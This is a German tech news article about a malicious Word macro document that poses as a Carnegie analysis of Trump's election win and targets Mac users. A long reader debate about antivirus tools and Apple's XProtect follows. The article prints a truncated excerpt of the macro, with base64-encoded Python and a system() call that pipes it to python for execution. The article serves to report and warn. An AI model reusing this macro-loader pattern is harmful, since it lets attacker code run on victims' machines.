Push-Nachrichten von MacTechNews.de
Würden Sie gerne aktuelle Nachrichten aus der Apple-Welt direkt über Push-Nachrichten erhalten?

Makro-Virus greift Word-Nutzer auf dem Mac an

Mithilfe der Makro-Unterstützung in Microsoft Office lassen sich wiederkehrende Aufgaben auch über mehrere Dokumente hinweg flexibel automatisieren. Angesichts der Möglichkeiten erlaubt dies Angreifern unter Umständen aber auch, Schädlinge einzuschleusen. Daher gelten Office-Dokumente mit integrierten Makros seit jeher als ein Sicherheitsrisiko und sollten nur bei vertrauenswürdigen Quellen geöffnet werden. Ganz aktuell ist dies bei einem Mac-Schädling, der momentan Umlauf ist.


Wie Sicherheitsexperten berichten, findet momentan ein Word-Dokument mit schädlichen Makros Verbreitung, das unter dem Dateinamen "U.S. Allies and Rivals Digest Trump’s Victory - Carnegie Endowment for International Peace.docm" eine englischsprachige Analyse des US-Wahlsiegs von Donald Trump verspricht. Tatsächlich versucht das Dokument aber auch, sofern auf dem Mac kein LittleSnitch läuft, schädliche Python-Scripts nachzuladen, die dann vermutlich mithilfe von Sicherheitslücken eine Hintertür in das System einrichten. Angreifer würden so die Kontrolle über das System erlangen.


Bedenklich ist in diesem Fall, dass nicht alle auf dem Markt befindlichen Virenscanner den schädlichen Makro erkennen. Immerhin warnt Microsoft Office selbst noch den Nutzer vor der Aktivierung der enthaltenen Makros. Je nach Arbeitshintergrund könnte diese Warnung von Nutzern aber "weggeklickt" und damit die Ausführung des Makros bestätigt werden. Offenbar spekulieren die Angreifer damit einmal mehr auf leichtsinnige Opfer, welche die letzten Hürden des Angriffs selber aus dem Weg räumen.
Auszug aus der Analyse
$ unzip "U.S. Allies and Rivals Digest Trump’s Victory - Carnegie Endowment for International Peace.docm"

inflating: [Content_Types].xml
inflating: _rels/.rels
inflating: word/_rels/document.xml.rels
inflating: word/document.xml
inflating: word/theme/theme1.xml
inflating: word/vbaProject.bin
...

Solche Anwender haben allerdings Glück im Unglück, denn aktuell ist der Server zum Nachladen der schädlichen Programmanweisungen nicht erreichbar. Ob der Angriff bereits vor einiger Zeit erfolgreich war, ist nicht bekannt. In jedem Fall sollten Mac-Nutzer bedenken, dass es trotz der verschiendenen Sicherheitsfunktionen von macOS wie beispielsweise Gatekeeper nach wie vor Möglichkeiten gibt, durch Trojaner wie einem Word-Dokument oder einer Browser-Seite das System zu beschädigen.
Weiterer Auszug aus der Analyse
$ sigtool --vba word/vbaProject.bin
...
cmd = "ZFhGcHJ2c2dNQlNJeVBmPSdhdGZNelpPcVZMYmNqJwppbXBvcnQgc3"
cmd = cmd + "NsOwppZiBoYXNhdHRyKHNzbCwgJ19jcmVhdGVfdW52ZXJpZm"
...
cmd = cmd + "0pKQpleGVjKCcnLmpvaW4ob3V0KSk="

result = system("echo ""import sys,base64;exec(base64.b64decode(\"" " & cmd & " \""));"" | python &")

Kommentare

Peter Eckel10.02.17 11:50
Also, wenn ich das richtig sehe, dann muß man:

1. Word auf dem Rechner haben
2. Little Snitch nicht auf dem Rechner haben
3. Fragwürdige Mails öffnen
4. Dann auch noch Attachments in fragwürdigen Mails öffnen
5. Und zuletzt die Warnmeldung bezüglich der enthaltenen Macros in den Attachments in fragwürdigen Mails abnicken

Über die ersten beiden Punkte mag man ja geteilter Meinung sein, aber unter welchem Stein muß man denn die letzten 20 Jahre verbracht haben, um die Punkte 3-5 zu erfüllen?

OK, ich erinnere mich gerade an ein jüngst geführtes Telefonat mit einem Mailserver administrierenden Kollegen. Es muß ein verdammt großer Stein sein, sonst wäre es da sehr eng.
Ceterum censeo librum facierum esse delendum.
+2
sierkb10.02.17 12:37
heise (08.02.2017): MacDownloader: Iranische Malware zielt auch auf Macs ab
Die Malware wird gegen Menschenrechtler und Mitarbeiter von Rüstungsfirmen eingesetzt, erklären Sicherheitsforscher. Sie soll den Mac-Schlüsselbund mit den Zugangsdaten des Opfers an die angeblich iranischen Angreifer übermitteln.
heise/Iran Threats
"Mac-Nutzer wähnen sich sicherer als sie sind"

Gerade Menschenrechtler, die sich auf den Iran konzentrieren, setzten – ebenso wie andere Communities – inzwischen wegen "Sicherheit und Stabilität" verstärkt auf Apple-Geräte, erläutern die Sicherheitsforscher: MacOS-Nutzer wähnen sich womöglich besser vor Malware geschützt als sie tatsächlich sind und “könnten genau deshalb verwundbarer sein”.
Iran Threats
While this agent is neither sophisticated nor full-featured, its sudden appearance is concerning given the popularity of Apple computers with certain community, and inaccurate perceptions about the security of those devices.
Peter Eckel
Über die ersten beiden Punkte mag man ja geteilter Meinung sein, aber unter welchem Stein muß man denn die letzten 20 Jahre verbracht haben, um die Punkte 3-5 zu erfüllen?

Peter Eckel: Frage beantwortet? Sowas geht schnell. Schneller als man denkt.
Siehe dazu auch dieser Kommentar bei heise, dem ich leider nur zustimmen kann: .

Es funktioniert immer wieder. Gerade auch bei Mac-Nutzern. Genau deshalb gibt es diese Art Versuche und Angriffe. Von 1000 Menschen muss nur einer oder eine handvoll Leute drauf klicken und sich was vorgaukeln lassen bzw. sich sowas dann an Land holen, schon ist es für die Macher ein Erfolg und Ansporn, an der Front erst recht nachzuschieben und weiterzumachen. Und seien wir mal ehrlich: es wird mittlerweile teilweise verdammt gut getrickst und gertäuscht und der Benutzer mit seinen Sinnen getäuscht, sodass selbst geschulte Profis manchmal Schwierigkeiten haben und wirklich extrem aufmerksam sein und aufmerksam gucken müssen, um den Schwindel und der Trickserei auf die Spur zu kommen und nicht in die Falle zu tappen. Bzgl. Scam und Ransomware per email oder gekaperter unsicherer Wordpress-Blogs oder untergejubelter Werbebanner auf vermeintlich seriösen und sicheren Seiten doch leider ganz genauso.

Es ist mittlerweile leicht, leider , in eine solche Falle zu tappen, zu vielfältig und breit sind sie ausgelegt, zu raffiniert und gut getarnt sind sie teilweise gemacht, und es werden sich von den Machern immer raffiniertere Tricksereien einfallen gelassen, um trotz Wachsamkeit, trotz Schutzvorrichtungen, trotz Aufklärung der Nutzer doch noch zum Ziel zu kommen. Scam, Ransomware, Bot-Netze verbreiten sich nicht ohne Grund und sind mittlerweile auch auf der Mac-Plattform in nicht mehr vernachlässigbarer Anzahl angekommen. Leider!
+2
PaulMuadDib10.02.17 13:01
Das übliche Bla Bla.
Und wie immer hilft das Schlangenöl _nichts_.
-3
sierkb10.02.17 13:04
PaulMuadDib:

Erstens wird diese Malware durchaus von einigen (22) AV-Programmen erkannt mittlerweile.
Zweitens: Du meinst dasselbe und auf dieselbe Art arbeitende Schlangenöl, das Apple in sein Betriebssystem als Schutzmaßnahme eingebaut hat und das da umgangen wird bzw. diesbzgl. ebenfalls und erst recht leider noch keine aktuelle Signatur dagegen verabreicht bekommen hat (ein XProtect-Update steht noch aus, der Stand ist vom 17.01.2017, da ist noch keine Signatur gegen diese vorliegende Malware drin) und Apples eingebaute Schutzsoftware mangels aktueller Pflege der Signatur durch Apple da noch nicht greifen kann, Apple da zuvorderst also patzt und säumig ist mit einer entsprechend erkennenden Signatur?
-1
PaulMuadDib10.02.17 13:12
"mittlerweile"
Entdecke den Fehler.
+4
sierkb10.02.17 13:15
PaulMuadDib:

Da ist kein Fehler. Als Patrick Wardle es entdeckte, und vor gut einem Monat (16. Januar, siehe sein Screenshot auf seiner Webseite) sein Sample bei VirusTotal hochlud, um es testen zu lassen, waren es bei seinem Versuch lediglich 4 AV-Hersteller, die es erkannt haten, mittlerweile und mit dem heutigen Tage (10. Februar) sind es immerhin bereits 22: . Das sind zwar nicht alle, das sind aber doch schon deutlich mehr als die 4 vor einem Monat. Mal fair bleiben in der Betrachtung und Beurteilung, was das angeht.
Es ist zudem IMMER ein Hase und Igel-Spiel. Es war nie anders, und es wird nie anders sein. Und lieber vezögert gebremst als gar nicht und ungebremst, oder?
Und Apple ist trotzdem immer noch säumig, XProtect hat trotzdem immer noch keine entsprechende Signatur, um's zu erkennen und zu blockieren. Andere AV-Hersteller sind da in ihrer Reaktion und Bereitstellung von aktuellen Signatur-Updates offenbar schneller, schneller als Apple allemal. Zwar nicht alle. Aber einige.
0
PaulMuadDib10.02.17 13:28
Du raffst es nicht, oder? Diese ganze Mist-Software macht schon seit ewigen Zeiten mehr Arbeit, als sie eigentlich verhindern sollen. Das ganze Zeug ist nutzlos.

Aber offenbar sieht sich niemand in der Lage, sich einen neuartigen Schutz auszudenken. Klar, von den Schlangenöl-Herstellen ist nichts zu erwarten. Das Geschäft floriert. Die Gerichte helfen denen ja noch dabei ("Scanner ist Pflicht, bla, bla").

Ich habe mit dem Zeug seit bestimmt 20 Jahren in einer mittelgroßen Umgebung zu tun. Noch nie, wirklich noch nie wurde eine Welle vorher rechtzeitig abgewendet. Scherben aufkehren, das ist Arbeit. Und das Zeug am Laufen halten. Und das in einer abgeschotteten Umgebung. Das verrückteste daran: diese ganzen Suiten lassen oft nur sehr schlecht ohne direkte Internetverbindung betreiben. Und die schreiben sich "Sicherheit" auf die Schachtel. Na, ist klar.
0
sierkb10.02.17 13:39
PaulMuadDib:

Nein, Du raffst es nicht, denn anscheinend hast Du keine Ahnung von den eingebauten Schutzmechanismen in macOS, wovon XProtect und Gatekeeper ganz entscheidende Komponenten sind, und wie sie funktionieren und arbeiten. XProtect funktioniert dabei genauso und auf derselben Basis wie das was Du als Schlangenöl bezeichnest, nämlich signaturbasiert, die Signaturen liegen in /System/Library/CoreServices/XProtect.bundle/Contents/Resources/XProtect.plist neuerdings sogar zusätzlich als YARA-Signatur- basiert (/System/Library/CoreServices/XProtect.bundle/Contents/Resources/XProtect.yara), (YARA gehört zu VirusTotal und damit zu Google). Und Apple pflegt diese Signaturen leider nur sehr unzureichend bis miserabel, von deren zügiger und regelmäßiger Pflege durch Updates hängt aber durchaus viel ab.
Würde Apple seinen Job da richtig machen und das wenigstens pflegen, dann hättest Du Recht, dann bräuchte man das alles wirklich nicht bzw. erst recht nicht. Apple pflegt XProtect aber leider nicht, lässt es im Grunde sogar verrotten. Nicht nur reagiert Apple da total grottenlahm auf aktuelle Bedrohungen, sondern sie decken mit der in den XProtect-Signaturlisten stehenden Schadsoftware auch nur einen winzigen Bruchteil der mittlerweile in Umlauf seienden Mac-Schadsoftware und Mac-Bedrohungen ab. Nur einen winzigen Bruchteil. Und der sogar fast regelmäßig mit ordentlich Zeitverzögerung eingepflegt. Du kannst Dich leider nicht auf XProtect verlassen, eben weil Apple es so sehr schlecht pflegt. Schön wäre es, könnte man wenigstens das.

Da brauchst Du gar nicht mit dem Finger auf Dritthersteller zeigen und Fehler und Lahmarschigkeit bei denen suchen. Apples eingebauter Grundschutz in macOS, wovon XProtect ein entscheidender Teil als Bestandteil des quarantine-Frameworks ist, ist unzureichend und vielfach wirkungslos, einfach weil von Apple schlecht gepflegt. Wäre es von Apple besser gepflegt, wäre es ein Grundschutz, auf den man sich wenigstens einigermaßen verlassen könnte. Mit aktuellen Signaturen steht und fällt da aber alles. Wie bei allen anderen AV-Herstellern auch. Auf genau dieselbe Art und Weise. Das sind einfach (zugegeben lästige) Hausaufgaben, die da gemacht werden müssen, aber sie müssen gemacht werden.
+2
PaulMuadDib10.02.17 14:12
Was interessiert mich, wie dieser ganze Mist funktioniert? Gar nicht.

Und was hast Du als mit XProtect und dem ganzen Müll? Wenigstens reißt der keine scheunengroße Löcher ins System, indem es versucht sich in die Firewall zu klinken, oder noch schlimmer den https-Verkehr umzuleiten.
-1
sierkb10.02.17 14:44
PaulMuadDib
Was interessiert mich, wie dieser ganze Mist funktioniert? Gar nicht.

Das sollte es aber, bevor Du hier laut herumblökst und sagst: "Alles Quatsch!"
Und was hast Du als mit XProtect und dem ganzen Müll?

Ich weise Dich damit darauf hin, dass man sich darauf eben leider nicht verlassen kann und schon allein deshalb evtl. durch eine zusätzlich installierte Software, die genau diese Erkennungslücke schließt, die das schlecht gepflegte XProtect lässt, angeraten sein kann (nicht muss, aber kann, das sollte jeder für sich selber entscheiden, und im Firmenumfeld entscheiden das womöglich andere über Deinen Kopf hinweg und nötigen/trotzen es Dir schon allein aus rechtlichen Gründen evtl. ab, auch, wenn Du persönlich anderer Meinung sein solltest). Schlangenöl hin, Schlangenöl her. Schwarze Schafe hin (die gibt es zweifelohne, aber nicht alle sind welche, bitte nicht alle über einen Kamm scheren), schwarze Schafe her.

Oder anders ausgedrückt: verlässt Du Dich auf Apple eingebaute Mechanismen, die technisch zudem durchaus genauso arbeiten wie das Dir verhasste Schlangenöl von Drittherstellern (verdammst Du die in tutto, solltest Du also auch Apples Maßnahmen verdammen, weil sie genau das Gleiche in grün tun, das sogar auf einem noch viel unzureichenderen Level, weil Apple eben so lahmaraschig ist und es nicht regelmäßig pflegt). Sprich: verlässt Du Dich allein auf XProtect und darauf, dass Apple irgendwann mal in die Pötte kommt und Signatur-Updates bereitstellt, stehste fast nackt da. Zumal wie bereits gesagt in Apples Signatur-Liste nur ein Bruchteil an in den letzten 2-3 Jahren aufgelaufener Schadsoftware drinsteht, legt man aber mal dieselbe Zählweise an, die man auch gegenüber Windows-Schadprogrammen anlegt, man inzwischen auf mehrere hunderttausend verschiedene Arten bzw. Variationen kommt und sich die Anzahl derzeit recht schnell der Million annähert, je nach Hersteller, die aktuelle Mac-Plattform betreffend. Täglich kommen neue hinzu. Und Apples XProtect bildet davon nur einen winzigen Bruchteil ab, einige sind da gar nicht drin zu finden in Apples Liste.
Wenigstens reißt der keine scheunengroße Löcher ins System, indem es versucht sich in die Firewall zu klinken, oder noch schlimmer den https-Verkehr umzuleiten.

Bitte nicht vom Thema ablenken, und es steht hier überhaupt nicht zur Debatte, welche schwarzen Schafe es da draußen gibt, wobei man da nicht alle über einen Kamm scheren sollte, denn es gibt auch positive Ausnahmen – Apples Grundschutz, ganz ohne derlei Dritthersteller-Software, allem voran XProtect ist löchrig genug. Beklagenswert genug. Beschränken wir uns mal allein darauf. Verlässt Du Dich allein auf XProtect und Apples eingebauten Grundschutz, bist Du gegen diese beiden in Rede stehenden Bedrohungen derzeit leider nicht geschützt, ein einfaches Signatur-Update via XProtect-Update könnte diese Lücke sehr leicht schließen.
Manuell anstoßen kannst Du es ggf. mit einem sudo softwareupdate --background-critical im Terminal. Da Apple derzeit aber offenbar kein XProtect-Update bereithält und auf deren Update-Server, wo es liegt, derzeit nichts zu finden ist, diesbzgl., dürfte das derzeit ins Leere laufen. Mal abwarten, wann Apple die Signaturen erneuert.
Wenigstens reißt der keine scheunengroße Löcher ins System, indem es versucht sich in die Firewall zu klinken

Die Kritik, die derzeit überall zu lesen ist und die Du hier themenfern anzubringen versuchst, ist zwar völlig berechtigt, da gebe ich Dir ja sogar Recht, es ist aber eine völlig andere Baustelle, um das geht es hier überhaupt nicht, das spielt hier in den vorliegenden Fällen und Apples eigenen Grundschutz betreffend überhaupt keine Rolle. Beschränken wir uns auf das, was Apples System von Haus aus zur Verfügung stellt an diesbzgl. Schutzmaßnahmen, da gibt es Kritik und Löcher und Nichtfunktionieren genug.
Zudem: was meinst Du, wie tief verzahnt das Quarantine-Framework in macOS ist nebst MRT.app (MRT = Malware Removal Tool) und Gatekeeper? Mindestens genauso oder noch mehr. Und hat trotzdem ab und zu Lücken, grad' auch Sicherheitslücken. So ganz ohne Fehl und Tadel und Risiko und Angriffspunkten ist Apples eingebaute Lösung eben leider auch nicht.

Apples XProtect schützt Dich im Moment leider NICHT gegen diese in Rede stehenden Bedrohungen. Ein simples diesbzgl. Signatur-Update würde es ändern. Apple gehört somit zu genau den Nachzüglern, deren Software diesbzgl. so eine Bedrohung weder erkennen noch abfangen kann und wenn Apple sich dazu bequemt, ein Signatu-Update zu machen, sie also von Dir genauso in Bausch und Bogen verdammt werden sollten, wie Du es gegenüber den Drittherstellern tust, weil eben Deiner Ansicht nach zu spät bzw. mit derlei großer Verzögerung. Da ist Apple also genauso eine Schlafmütze wie andere auch, eigentlich sogar leider noch eine viel schlimmere Schlafmütze, denn wozu führe ich einen systemeigenen Grundschutz ein, wenn ich ihn so schlecht pflege und da immer Nachzügler bin und vieles einfach auslasse? Da ist Microsoft mit seinen Signatur-Updates für deren eingebauten Defender-Grundschutz aber zügiger und besser am Ball als Apple, zumindest haben sie sich da durchaus verbessert, was man da mitbekommt.
+3
Stereotype
Stereotype10.02.17 19:29
sierkb

Siehe dazu auch dieser Kommentar bei heise, dem ich leider nur zustimmen kann: .

Dieser Heise-Kommentar ist an Dummheit, Vorurteilen und Kurzsichtigkeit kaum zu überbieten. Aber typisch, wer seine Quellen von Heise und seinem Forum bezieht, befindet sich in einer undurchdringbaren schwarzgemalten Filterblase.
-1
senf_311.02.17 07:13
Peter Eckel
Also, wenn ich das richtig sehe, dann muß man:

1. Word auf dem Rechner haben
2. Little Snitch nicht auf dem Rechner haben
3. Fragwürdige Mails öffnen
4. Dann auch noch Attachments in fragwürdigen Mails öffnen
5. Und zuletzt die Warnmeldung bezüglich der enthaltenen Macros in den Attachments in fragwürdigen Mails abnicken

Über die ersten beiden Punkte mag man ja geteilter Meinung sein, aber unter welchem Stein muß man denn die letzten 20 Jahre verbracht haben, um die Punkte 3-5 zu erfüllen?

OK, ich erinnere mich gerade an ein jüngst geführtes Telefonat mit einem Mailserver administrierenden Kollegen. Es muß ein verdammt großer Stein sein, sonst wäre es da sehr eng.
Und wo hast Du die letzten 20 Jahre verbracht? Es sind unglaublich viele Leute die sich diesen Schrott einfangen würden, wenn sie ihm begegnen würden. Selbst wenn man mal unterstellt, dass jeder Mac User wirklich Little Snitch installiert hat, die meisten wüssten wiederum nicht, wann sie 'erlauben' und wann sie 'nicht erlauben'klicken müssten. Die wenigstens Leute sind im Netz unterwegs und halten sich über Viren & Co auf dem Laufenden - das Thema interessiert den 'normalen' Menschen einfach nicht.
+5
@elias11.02.17 13:33
senf_3
Und wo hast Du die letzten 20 Jahre verbracht? Es sind unglaublich viele Leute die sich diesen Schrott einfangen würden, wenn sie ihm begegnen würden. Selbst wenn man mal unterstellt, dass jeder Mac User wirklich Little Snitch installiert hat, die meisten wüssten wiederum nicht, wann sie 'erlauben' und wann sie 'nicht erlauben'klicken müssten. Die wenigstens Leute sind im Netz unterwegs und halten sich über Viren & Co auf dem Laufenden - das Thema interessiert den 'normalen' Menschen einfach nicht.

Ok, bis auf Little Snitch sollte jeder Computernutzer in der Lage sein sich darüber zu informieren. Ich sehe das als Pflicht. Wenn ich ohne jegliche Beachtung von Regeln auf die Strasse gehe und überfahren werde, dann wird kein Gericht der Welt mich davon Freisprechen die Regeln nicht gekannt zu haben - selbst Schuld.

Genau so sehe ich es im digitalen Zeitalter, wer sich einen Computer zulegt sollte zumindest diese Grundregeln über Sicherheit und Verhalten aneignen deshalb hier auch - selbst Schuld.
+1
senf_311.02.17 17:02
@elias

Ok, bis auf Little Snitch sollte jeder Computernutzer in der Lage sein sich darüber zu informieren. Ich sehe das als Pflicht. Wenn ich ohne jegliche Beachtung von Regeln auf die Strasse gehe und überfahren werde, dann wird kein Gericht der Welt mich davon Freisprechen die Regeln nicht gekannt zu haben - selbst Schuld.

Genau so sehe ich es im digitalen Zeitalter, wer sich einen Computer zulegt sollte zumindest diese Grundregeln über Sicherheit und Verhalten aneignen deshalb hier auch - selbst Schuld.

Nach dem Motto " man wird ja nochmal träumen dürfen"
+1
thedreadroberts
thedreadroberts13.02.17 09:01
@sierkb
ich bewundere immer wieder Deine Geduld, mit der Du den Apple-Limbotänzern, die institutionalisiert nicht begreifen wollen, was nicht sein darf, zu erklären versuchst, was offensichtlich ist.
+1
PaulMuadDib13.02.17 10:26
Er erklärt gar nichts. Er packt wenig Inhalt in ganz viel Worte.

Also was ist denn so offensichtlich?
0
sierkb13.02.17 14:09
thedreadroberts:

Danke.

PaulMuadDib:

Mach's besser!
Da kommt von Dir alternativ bloß blaue Luft, zur Schau getragenes Nichtwissen nebst dazu passender Nicht-Argumentation, dafür aber viel Scheuklappen-Denke, die zudem am eigentlichen Thema vorbeigeht und alles, was nicht in Dein Schema passt, wird ausgeblendet und kaltschnäuzig abgebügelt,und das Ganze im persönlichen Angriff in unfeinem, aggressiven Umgangston.

XProtect arbeitet technisch genauso, wie das Zeugs, auf dem Du so herumkloppst! Und das noch nicht mal qualitativ gut, weil leider von Apple nicht gepflegt. Es arbeitet ebenfalls mit genau solchen Signatur-Listen, gegen die bei jeder Datei-Operation des Fiinders (und eben leider nur der Finder, leider nicht auf anderen Ebenen, die nicht Finder-basiert sind) verglichen wird,. Und diese so zentral wichtigen Signatur-Listen sind bei Apple sogar noch schlechter gepflegt als bei irgendeinem anderen AV-Hersteller, dessen Software ebenfalls gegen eine solche Liste prüft. Der ganze News-Artikel hier existiert nur deshalb, Patrick Wardle konnte nur deshalb was drüber schreiben, eben weil Apples XProtect und Gatekeeper hier versagt haben, einmal wieder versagt, wie so oft, und er benennt es regelmäßig. Apple schlampt hier, ist hier nachlässig, hinkt hier hinterher, behandelt sein XProtect stiefmütterlich, erneuert seine Signaturliste nur höchst unbefriedigend und unregelmäßig, und da steht auch viel zu wenig drin, einen großteil an für den Mac und iOS derzeit im Umlauf befindlicher Schadsoftware kennt XProtect gar nicht, weil sie keine Signatur in der XProtect.plist drinstehen hat, sowas rauscht am Erkennungsschirm dieser in macOS eingebauten Schutzfunktion unerkannt vorbei, rutscht durch die Maschen des Netzes. Eine besser gepflegte Signatur-Datei, die mehr Schadsoftware für macOS erkennt, wäre ein Segen! Und ja, sie wäre dann größer, und ja, es bläht dann das System auf, weil im Speicher gehalten werden müsste und bei jeder Datei-Operation das Quarantäne-Framwork gegen diese lange Liste checken müsste.

Kein Wunder, dass der Fußabdruck von Apples Lösung da so gering ist derzeit, wenn da nur eine handvoll an in Umlauf befindlicher Schadsoftware drinsteht (vergleiche mal den Inhalt von XProtect.plist und die Anzahl der Signaturen und Schadsoftware, die darin verzeichnet ist auf der einen Seite und lege dann mal eine Signatur-Liste eines AV-Drittherstellers daneben und vergleiche mal, was XProtect da stehen hat an AV-Signaturen und was eine AV-Software drin stehen hat in seiner Signatur-Liste an AV-Signaturen), aber der Rest, der nicht drinsteht, der derzeit aber trotzdem da draußen existiert an aktuelle Macs und iOS-Geräte bedrohender Schadsoftware und in Umlauf ist inklusive seiner ganzen Varianten, die fast täglich mehr werden und ständig variieren, der rauscht da derzeit an dem Teil unerkannt vorbei und bedeutet für den Mac-Anwender, der dagegen eben durch XProtect leider nicht geschützt ist, weil es das Zeug nicht erkennen kann, weil es in seiner Liste gegen die geprüft wird, nicht drinsteht, eine Bedrohung. Face the facts.

Mache Dir doch einfach mal den Spaß und vergleiche: von welcher Schadsoftware, die es erkennen und dessen Ausführung blockieren kann, weiß XProtect.plist und von welcher Schadsoftware, die es erkennen kann, allein und nur die macOS- und iOS-Plattform betreffend, weiß eine beliebige andere AV-Software, eines beliebigen Herstellers. Zähl' doch einfach mal die Einträge darin und die Anzahl der Schadsoftware nebst Varianten. Mach's einfach mal. Vergleiche mal. Und dann können wir über das Thema gerne weiterreden. Wenn Du also AV-Software kritisierst, dann bitte Apples eingebaute AV-Software ebenfalls und gleich mit und gleich vornedran und erst recht, bitteschön, denn die gehört da ebenfalls genannt und ihr Versagen und Nicht-Erkennenkönnen (weil kaum was drinsteht, weil zudem schlecht gepflegt) gehört dann erst recht genannt!

Nochmal: wäre Apples eingebauter Grundschutz, von dem XProtect und dessen Signaturliste ein ganz entscheidender Bestandteil ist, wirkungsvoll und würde funktionieren, weil Apple ihn gut pflegt und die Signaturliste immer und zügig aktuell hält, hätten wir diese Newsmeldung hier gar nicht, dann hätte der Forensikexperte und frühere NSA-Mann Patrick Wardle nichts zu finden und zu beanstanden gehabt.

Einfach mal ehrlich und fair sein in der Debatte. Und nicht ständig das Versagen anderer anprangern, an der Technik herummosern, gleichzeitig beim selben Thema aber noch viel früher versagen und es erst recht nicht hinbekommen haben und das bei zudem durchaus gleicher technischer Vorgehensweise wie die geprügelte Konkurrenz (das, weswegen die zurecht Prügel zu beziehen hat, ist eine ganz andere Baustelle, hat mit dem eigenen Versagen von Apples Lösung herzlich wenig zu tun, das ständige Daraufhinweisen auf die schwächen anderer ist doch lediglich das Ablenken von eigenen Schwächen am eigenen Produkt namens XProtect). Das ist doch alles nicht das Thema. Wäre XProtect wirklich gut und würde Apple es besser pflegen, gäbe es hier überhaupt nichts mehr zu diskutieren, dann gäbe es da keine Versorgungslücke.
-2
PaulMuadDib14.02.17 07:15
Was ein Geseier. Es ist mir völlig egal. Diese Hersteller behaupten, irgendwas zu schützen, was in Wirklichkeit bloß Augenwischerei ist. Und das ist der eigentliche Skandal.
+2
sierkb14.02.17 09:36
PaulMuadDib:

Warum äußerst Du Dich dann überhaupt dazu, wenn es Dir so egal ist? Anderen Tonfall zudem bitte. Ich habe Dir nichts getan. Pflegel.
Skandal ist hier höchstens, dass Apple XProtect.plist immer noch nicht upgedatet hat und da keine Signatur gegen diesen Schädling drin ist. Patrick Wardle nimmt Apples XProtect genau deshalb schon gar nicht mehr ernst, weil es so von Apple unzureichend und schlecht gepflegt und so leicht zu umgehen und so wie es ist, tatsächlich nur Chi-Chi ist, auf das man sich so überhaupt nicht verlassen kann und sollte – der lacht da jedes Mal drüber, baut da schon gar nicht mehr drauf, erwähnt es schon gar nicht mehr in seinen Berichten, äußert sich bestenfalls negativ drüber.

Nochmal: diese Newsmeldung gibt es, weil an vorderster Stelle XProtect bzw. Apples eingebaute Schutzmaßnahmen versagt haben. Hätten die gegriffen, hätte es diese Newsmeldung hier nicht gegeben. Dass so manche deshalb zusätzlich eingerichtete Schutzmaßnahme zunächst auch nicht gegriffen hat (inzwischen aber sehr wohl), ist eine ganz andere Diskussion. Auch Apples Schutzmaßnahme könnte inzwischen greifen. Wenn denn Apple sich bequemen würde, die betreffende X-Protect-Signatur-Datei um eine entsprechende Signatur (ein läppischer SHA-String) zu bereichern. Haben sie aber bisher noch nicht getan.
-2
PaulMuadDib14.02.17 19:29
Schon wieder X-Protect
Ich darf morgen auf dem Trend-Micro-Workshop nicht vergessen zu fragen, wie hoch deren signaturbasierte Trefferquote ist. Mal gespannt, ob die sich trauen eine größere Zahl als SEP anzugeben …
0
sierkb15.02.17 01:10
PaulMuadDib
Schon wieder X-Protect

Genau. Weil Du es so herrlich verneinst und die Augen davor verschließt und es Dir ja herzlich egal ist, wie das alles funktioniert und miteinander zusammenhängt. XProtect IST halt nun mal Apples eingebaute AV-Scanner-Lösung als integraler Bestandteil des Quarantäne-Frameworks, so wie Microsoft seinen Windows-Defender in Windows eingebaut und zum festen Bestandteil des Betriebssystems gemacht hat. Ich kann nichts dafür, Apple nacht es halt seit einer ganzen Weile so und nicht anders. Und diese Apple'sche AV-Lösung namens XProtect funktioniert technisch nach genau demselben technischen Prinzip und mit genau den gleichen Erkennungs- und Zuordnungs-Methoden wie genau jene AV-Lösungen von Drittherstellern, auf die Du so beherzt eindrischt und ihnen prinzipiell die Eignung absprichst. Nämlich signaturbasiert per SHA-Hashes. Und ebenfalls reaktiv, also nachregelnd und damit in Deinen Augen prinzipiell zu spät (wobei man durchaus auch sagen könnte: lieber mit ein wenig Verspätung erkannt als gar nicht erkannt – viele Nutzer profitieren dann davon, selbst wenn die Signatur erst mit ein paar Tagen Zeitverzögerung bereitsteht, weil man seitens des Anbieters erst dann Samples zur Analyse und Generierung der Signatur zur Verfügung hatte, das reicht aber oft aus, um eine ungehinderte, ungebremste Verbreitung des Schädlings wenigstens einzudämmen und wirkungsvoll auszubremsen).

Sind die Lösungen der AV-Dritthersteller ungeeignet und Augenwischerei und sind mit ihren Signatur-Updates nicht gleich am ersten Tag dabei, um derlei frühzeitig komplett abzufangen, dann ist es Apples XProtect leider ERST RECHT, weil genau gleich funktionierend und auf dem selben Prinzip und auch von der Methodik und Technik her sehr gleich funktionierend. Und leider NOCH schlechter erkennend/funktionierend und NOCH schlechter gewartet von Apple. Es wäre schön, wäre es anders und wäre es besser und besser gewartet. Dem ist aber leider nicht so. XProtect hat heute, 15.02.2017 leider immer noch kein Signatur-Update erfahren, das die in Rede stehende Schadsoftware erkennen und somit blockieren kann, das betreffende Signatur-Update lässt immer noch auf sich warten. Manche andere AV-Software erkennen den Schädling inzwischen sehr wohl (27 an der Zahl).
PaulMuadDib
Ich darf morgen auf dem Trend-Micro-Workshop nicht vergessen zu fragen, wie hoch deren signaturbasierte Trefferquote ist.

Dann frag' mal. Ich bitte sogar darum. Viel Vergnügen. Hoffentlich gehst Du klüger raus als Du reingegangen bist, es wäre sonst schade um die Zeit.

Ein aktueller VirusTotal-Auszug bzgl. dieses aktuellen in Rede stehenden Trojaners sagt, dass TrendMicros Software ihn erkennt als: TROJ_FRS.0NA004B917 bzw. W2KM_DLOADR.YYSXV: , die haben ihr Signatur-Update inzwischen also gemacht, wie zahlreiche andere AV-Software-Hersteller auch.

Apples in macOS eingebautem XProtect erkennt diesen Schädling bisher leider immer noch nicht. Mangels entsprechender Signatur (SHA-Hash). Mangels aktuellem Signatur-Update.

Sich hier also aus dem Fenster zu lehnen und hämisch über andere zu lästern ist somit wohlfeil und Du tust Apple damit sicher keinen Gefallen damit, da dieser Vorwurf mit viel größerm Nachdruck auf Apple zurückfällt, denn sie sind hier in der Erkennungsrate und rechtzeitigen Signatur-Updates, um überhaupt etwas erkennen zu können, NOCH schlechter als jene gescholtenen Dritthersteller. Du solltest also erstmal Apple ins Gebet nehmen und bessere Arbeit anmahnen, denn es ist ihr Betriebssystem, ihre eingebaute AV-Lösung, ihre Verantwortung darüber, die hier einmal wieder erst recht wirkungslos ist wegen schlichten Nichtstun Apples und welche den anderen hinterherhinkt und viel viel größere Erkennungslücken aufweist als all die anderen.

Du argumentierst hier vor diesem Hintergrund unfair und unredlich: "Was siehst du aber den Splitter im Auge deines Bruders, den Balken aber in deinem Auge bemerkst du nicht?" (Matthäus 7,3)

